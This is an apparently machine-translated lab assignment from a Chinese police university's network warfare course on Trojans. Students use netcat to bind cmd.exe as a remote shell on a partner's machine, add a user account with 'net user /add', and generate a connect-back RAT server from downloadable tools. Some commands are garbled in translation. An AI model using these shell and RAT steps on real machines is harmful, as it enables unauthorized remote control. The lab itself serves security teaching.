Experiment 4 - malicious code technology

School number 201 721 430 024

Chinese People's Public Security University

Chinese people’ public security university

Network Warfare Technology

experimental report

Experiment 4

Malicious code technology

student name	Wang Runtian
grade	2017
District Team	Experimental class
mentor	Your opinion

Information and Network Security Technology College

201 6 Nian 11 Yue 7 Ri

Master experimental task

20 1 6 -20 1 7 grade Dai Ichi semester

First, the purpose of the experiment

1. With practice for the Trojans, so that readers understand and master the Trojans spread and mechanisms of operation; manually delete the Trojan, the Trojan checks to grasp and remove Trojans skills, learn Trojan defense-related knowledge, enhance awareness of security for the Trojans.

2. Understand and are familiar with common network attack tools, the basic functions of Trojans;

3. The purpose of the consolidation of curriculum knowledge and practical application.

Second, the experimental requirements

1. Carefully read the contents of each experiment, we need to capture the title, to be clear screenshots and annotate screenshots and descriptions.

2. Documentation Requirements clear structure, graphic expression accurate labeling specifications. Reasoning was objective, reasonable and logical.

3. Software tools are available NC, MSF and so on.

4. After the experiment, to retain electronic documents.

Three , experimental procedures

1. ready

Experimental preparation well in advance, should learn more about the purpose of the experiment, test requirements and test content before the experiment, familiar with the software tools and ready with a good experiment, in accordance with the requirements of experimental content and experimental content ready ahead of time.

2. lab environment

Describes the hardware and software environment used in the experiment (including a variety of software tools);

Office2003 boot and start the software or 2007, browser, encryption and decryption software.

3. experiment procedure

1) Start the system and start-up tool environment.

2) realization of experimental content using software tools.

4. experimental report

Write lab reports in accordance with the standard requirements of the test report format. The document prepared in accordance with the format template embedded test report document, the document written in accordance with the provisions of the written format, the form must be said that the graphics have a table Illustrated.

A task using the NC control computer

NetCat, with a network of Saber said it small and lean and powerful features make it small and lean, because his software has now been compressed to the size of only a dozen KB, but no reduction in functionality.

Experimental procedure requires two students with the completion of each other:

step one:

The machine (student A) the victim
enter the following command:
　　nc.exe the -l -p -e cmd.exe Port enter a listening mode

Step two:
　　the attacker's machine (students B).
Enter the following command:
　　NC // Port IP connection victim_IP, then get a shell. (Screenshot required)

Step three:

In the shell, using the net user username password / add, add a user, and use the net user command to verify the victim's machine. (Screenshot required)

You can continue through the command line to do something.

Task two Trojans control the use of computer

Tools:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

Experimental procedure requires two students with:

step one:

　The attacker's machine. (Student A)
open V2014.exe program or the star RAT, similar to the two Trojan functionality.

Step two:
　　Click on the menu bar of the "service generated" in the pop-configuration server, the configuration back to even the IP address (the attacker IP) and port number , and click the "Generate" button to generate a Trojan server.